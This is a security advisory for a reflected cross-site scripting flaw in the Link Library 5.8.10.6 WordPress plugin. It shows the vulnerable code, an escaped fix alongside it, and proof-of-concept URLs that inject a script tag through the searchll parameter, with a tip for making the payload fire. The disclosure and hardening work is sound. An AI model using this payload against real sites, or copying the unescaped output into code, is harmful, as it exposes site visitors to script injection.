Link Library 5.8.10.6 Reflected XSS

Homepage:

https://wordpress.org/plugins/link-library/

Description:

$_GET['searchll'] is written into the page output without being escaped.

File: link-library\render-link-library-sc.php

if ( 'search' == $mode ) {
    $output .= '<div class="resulttitle">' . __('Search Results for', 'link-library') . ' "' . stripslashes( $_GET['searchll'] ) . '"</div>';
}
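
The unescaped output described above, next to a hardened form that escapes the value at the point of output. This is an added example, not Link Library's code and not the vendor's fix. The function names are hypothetical, the input is constructed from the proof-of-concept value, and the __() and esc_html() stand-ins exist only so the file runs outside WordPress.

```php
<?php
// Stand-ins for running outside WordPress (assumption); inside WordPress
// the real __() and esc_html() are already defined and are used instead.
if ( ! function_exists( '__' ) ) {
    function __( $text, $domain = 'default' ) {
        return $text;
    }
}
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES, 'UTF-8' );
    }
}

// Behaviour from the advisory: the raw query value goes into the markup.
function ll_result_title_unescaped( array $query ) {
    return '<div class="resulttitle">' . __( 'Search Results for', 'link-library' )
        . ' "' . stripslashes( $query['searchll'] ) . '"</div>';
}

// Hardened form (hypothetical helper): accept only a string value and
// HTML-escape it, together with the translated label, when it is output.
function ll_result_title_escaped( array $query ) {
    $raw  = isset( $query['searchll'] ) ? $query['searchll'] : '';
    $term = is_string( $raw ) ? stripslashes( $raw ) : ''; // ignore ?searchll[]=...
    return '<div class="resulttitle">' . esc_html( __( 'Search Results for', 'link-library' ) )
        . ' "' . esc_html( $term ) . '"</div>';
}

// Constructed input: the search value from the proof of concept.
$query = array( 'searchll' => 'a <script>alert("XSS");</script>' );

echo ll_result_title_unescaped( $query ), PHP_EOL; // markup reaches the page as-is
echo ll_result_title_escaped( $query ), PHP_EOL;   // markup is rendered as text
```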

Proof of Concept:

The XSS will be visible on a page with the [link-library settings=1] tag.

http://wordpress_install/page_with_tag/?searchll=word_that_must_found_some_link <script>alert("XSS");</script>

The XSS will be visible only if the search function returns something.

So we can use a popular letter ("a" or "e") and put the XSS after a space. For example:

http://wordpress_install/page_with_tag/?searchll=a <script>alert("XSS");</script>

Timeline: